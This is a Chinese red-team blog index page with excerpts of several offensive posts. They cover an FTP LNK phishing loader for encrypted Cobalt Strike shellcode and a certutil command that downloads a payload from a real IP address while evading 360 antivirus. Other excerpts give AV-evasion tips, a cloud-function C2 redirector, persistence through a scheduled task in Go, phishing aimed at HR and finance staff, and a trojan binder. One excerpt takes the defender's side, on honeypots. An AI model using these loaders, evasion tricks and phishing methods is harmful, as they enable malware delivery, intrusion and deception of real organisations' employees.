Hyyrent blog

FTP LNK钓鱼技术背景 常规如果使用捆绑程序绑定正常文件和恶意木马释放，会调用很多windows api 这时候会及其容易引起设备的告警 像一些360的杀毒软件，常会产生 qvm 报毒拦截 并且如果蓝方队伍获取了木马程序，扔沙箱里会导致大量的虚拟beacon上线，对正常的攻防活动造成影响 使用方式1、cobaltstrike 生成 beacon_x64.bin，或者使用其他C2的shellcode（文件命名默认为beacon_x64.bin，更换需修改对应的python文件 ） 2、运行 python encrypt.py生成 data.json，里面为加密后的shellcode 3、把 data.json main.py 放到 __init__文件夹里 4、设置属性隐藏文件夹 __init__ 1attrib -s -h -r __init__ LNK属性填写 1C:\Windows\System32\ftp.exe -""s:__init__\python.dll 其中 python.dll 内容为 123!start /b __init__ ...

绕过360远程下载 urlcache中间为中文的双引号 1certutil && certutil -url“”cache -split -f http://121.204.212.212:60212/a bypassQVM上线单360查杀力不高，装了杀毒后直接儿子变爸爸，查杀力大大提升，对于简单的加密识别度较高，容易上线后云查杀过一会掉线，推荐使用分离加载方式，并使用反沙箱的代码延长马子时间 最大的特性是 QVM，360会对可疑程序进行拦截，标签为HEUR/QVM202.0.29xx.Malware.Gen 应对方法：降低熵值 添加图标、签名等可信资源 编译方式优化（使用QT、MFC编译，go使用多种参数结合编译） 加密函数算法使用uuid、rc4等调用库，避免使用AES等可疑算法 添加无用垃圾代码 熵值计算 https://github.com/yutianqaq/EntropyCalc_Go bypass360 psexec直接 psexec 报毒，由于impacket组件横向使用原版程序，hash特征已被标记 原版程序特征在 remcomsv ...

云函数新建一个云函数，在代码位置进行修改 首先导入 yisiwei.zip 的云函数包 12345678910111213141516171819# -*- coding: utf8 -*-import json, requests, base64def main_handler(event, context): C2 = 'https://49.xx.xx.xx' # 这里可以使用 HTTP、HTTPS~下角标~ path = event['path'] headers = event['headers'] print(event) if event['httpMethod'] == 'GET': resp = requests.get(C2 + path, headers=headers, verify=False) else: resp = requests.post(C2 + path, data=event[ ...

红队外网打点实战案例分享从最基础的登录框突破登录框作为hw出现场次最多的角色，也是最容易出洞的，下面介绍一些自己常用的测试方法 登录爆破小技巧 像这种系统的爆破我们有两种解决方法： 分析前端加密算法，写脚本模拟对密码进行加密 固定密码为123456 000000 使用常见的用户名作为字典进行爆破 两种方法各有优劣，我更倾向于第二种，在比赛打点效率会更高，分析加密算法更适用于红队检测项目 使用爆破的账号密码登入后台，便可以继续寻找后台上传点 看到图片类型这里限制上传的文件格式 直接添加 aspx 文件格式类型 成功getshell 修改返回数据包参数进入后台有些时候网站登录状态是根据前端判断的，这时候我们就可以直接修改返回包进行绕过 前端判断登录逻辑根据返回包的ret值决定，当返回值为1则成功登录 成功进入后台 插件探测常见sql注入和log4j漏洞sql注入插件推荐 https://github.com/smxiazi/xia_sql 基本原理是通过发送多个数据包，根据返回数据长度判断是否存在注入 除了被动扫描以外，我们还可以通过手动添加单引号、双引号去查看返回包 ...

简述钓鱼是攻防对抗中一种常用的手段，攻击者通常伪装成可信任的实体，例如合法的机构、公司或个人，以引诱受害者揭示敏感信息或执行恶意操作，能快速地撕破目标的伤口进行深入利用，快速进内网进行刷分，投递木马同时需要考虑逃避杀毒软件检测，本篇文章将围绕一些常见的钓鱼手法和木马免杀对抗展开 信息搜集大批量邮箱搜集大批量邮箱搜集可通过 https://app.snov.io/ http://www.skymem.info/ 搜索引擎但一般来说，企业邮箱都存在邮服网关，邮件很难投递，所以我们要选择私人邮箱或不被邮服拦截的邮箱 比如说 xx举报，xx招聘面对大众的邮箱，相关语法： 12345site:"xxx.com" 举报site:"xxx.com" 招聘xx公司举报 @126.comxx公司招聘 @qq.com 钓鱼手法社工钓鱼1、首先是目标选择，目标群体：hr、经理、财务 等安全意识薄弱的人优先选择，避开信息安全部 2、选择目标公司分部进行钓鱼成功率较高，前期提前想好话术和应变对策，避免被识破 2、社牛的师傅可以尝试电话钓鱼，获取信任再添加微信发送木 ...

在攻防中，上线机器总是需要手动进行维权，太过于麻烦，何不直接上线即维权呢，直接放核心代码，当做个记录 https://github.com/capnspacehook/taskmaster 12345678910111213141516171819202122232425262728293031323334353637383940package mainimport ( "os" "github.com/capnspacehook/taskmaster")func runWinTask(path string) { // 创建初始化计划任务 taskService, _ := taskmaster.Connect() defer taskService.Disconnect() // 定义新的计划任务 newTaskDef := taskService.NewTaskDefinition() // 添加执行程序的路径 newTaskDef.AddAction(taskmaster.ExecAction{ Path: path ...

社工钓鱼细节技巧钓鱼对象1、hr、经理、财务 等安全意识薄弱的人，避开信息安全部 如何搜集邮箱信息？ https://app.snov.io/ 但一般来说，企业邮箱都存在邮服网关，邮件很难投递，所以我们要选择一些针对公开群众的邮箱 比如说 xxx举报，xxx信息反馈面对大众的邮箱，如何搜集呢 钓鱼手法1、群发（不推荐，易被发现或被邮服拦截） 2、添加微信发送钓鱼木马（话术获取信任） 3、扫码活动钓账号 邮件投递木马1、木马需要打压缩，添加密码并隐藏内容，防止直接在压缩包内打开 2、后缀可选择其他非exe仍可执行的，如scr、com等 3、如果知道对方杀软没有360这种，可通过空格和长文件命名 免杀及捆绑文件自写工具介绍 杀软特性 杀软类型 免杀绕过技巧 火绒 编译参数限制多，对hash和字符串特征进行识别，静态能过动态基本不查杀，对很多go库调用报毒 360 单360查杀力不高，装了杀毒后直接儿子变爸爸，查杀力大大提升，对于简单的加密识别度较高，容易上线后云查杀过一会掉线，推荐使用分离加载方式，并使用反沙箱的代码延长马子时间，对资源查杀力度强，会报qvm 3 ...

github地址： https://github.com/sleeyax/burp-awesome-tls 需要高版本17+的burp运行插件，可bypass网站流量设备的检测，正常抓包 未使用插件前，burp指纹特征被识别，抓包被拦截 使用插件后正常抓包

溯源反制-自搭建蜜罐到反制攻击队前言本篇文章结合最近的ps比赛和之前的案例总结了一些作为蓝队的经验，希望能对蓝队溯源得分有所帮助，如果还有其他奇招妙法欢迎师傅们多多交流 溯源反制一直是老生常谈的话题，是红蓝双方的对抗博弈，即便是专业的红队也会有犯错的时刻，大致总结为下面这些原因： 比赛提供的机器太过于卡顿，使用虚拟机操作影响效率，心情浮躁直接真机操作 红队操作习惯不好，未使用干净的虚拟机操作，机器上存有可溯源身份的文件或信息 ”淹死的大多是会游泳的人“，因为有经验所以轻敌，抱有自己不会犯错的心理 对蜜罐判别不准确，未使用无痕模式或者识别蜜罐插件，甚至把蜜罐当作成果分享给队友 反制的大致流程 蜜罐部署部署一个高仿真的虚拟环境，这里有一些事项需要注意的 部署的蜜罐需提前向裁判报备，避免后续扯皮，且蜜罐需单独隔离，防止横向扩散 蜜罐不能太假，如多端口开启不同的web服务，系统要给攻击人员一种是靠自己努力获取成果的假象 如果直接使用xx厂商的云蜜罐，特征十分明显，还很容易在测绘平台上打上蜜罐标签，并且常规反制功能很鸡肋，触发条件很苛刻 这次直接使用之前用来漏洞调试的致远OA环境，考虑 ...

免杀木马捆绑器前言在攻防演练中，钓鱼是十分重要的一环，能够快速撕破目标的伤口，为了让钓鱼木马更具有迷惑性，需要释放正常的文件进行隐藏，因此诞生此捆绑器 版本更新 1.1版本 bypass常规杀软 (360、def、火绒等) 1.2版本 新增文件释放后自动隐藏 环境前置环境：go版本1.20以上、安装garble 1、 https://git-scm.com/download/win 下载安装git 2、安装garble 12set GOPROXY=https://goproxy.cn,directgo install mvdan.cc/garble@latest 环境未搭建好，可能会出现以下报错 12cannot get modified linker: exec: "git": executable file not found in %PATH%cannot get modified linker: exec: "garble": executable file not found in %PATH% 捆绑程序第一个参数为木马程序， ...